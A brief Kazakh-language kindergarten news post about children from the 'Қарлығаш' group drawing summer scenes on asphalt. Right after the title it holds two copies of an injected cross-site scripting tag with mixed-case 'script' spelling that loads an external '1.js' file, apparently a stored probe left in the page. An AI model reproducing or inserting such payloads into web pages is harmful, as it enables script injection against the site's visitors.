"Жаз мезгілін суретке саламыз"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.06.2019

Жаз-сүйікті мезгіл. Көптен күткен ыстық және бірқатарар қызықтар мен сауықтар.  Балалардың  қиялы әдетте сан алуан және жан-жақты болып келеді.   «Бұл рас, жасыратын несі бар, балалар  қағазда, асфальтта, қабырғада сурет салғанды қатты ұнатады...»

       Біздің қайсымыз бала кезімізде  асфальтқа сурет салмадық ? Сұр асфальттың кедір-бұдыр  бетінде керемет бояулардың ізі пайда болады.  Борымыз да сиқырлы түрде жоғалып, қолымызда тек  «түрлі-түсті» кішкентай тас қалады. Ал  асфальт болса керемет бояулардың нен құлпырып шыға келеді.  Бүгін  «Қарлығаш» тобының балалары  жазды  қызыға суреттеді: жарқын сәулесін шашқан алтын күн, көк аспандағы  аппақ ұлпа  бұлттар, алуан түрлі көбелектер көздің жауын алады. Ұжымдық жұмыста балалар жаздың жарқын бояуы мен өздерінің керемет көңіл-күйлерін  жеткізуге тырысты.     

Просмотров: 547


Пікір қосу



Деректерді қолтаңбаға қосу
Текст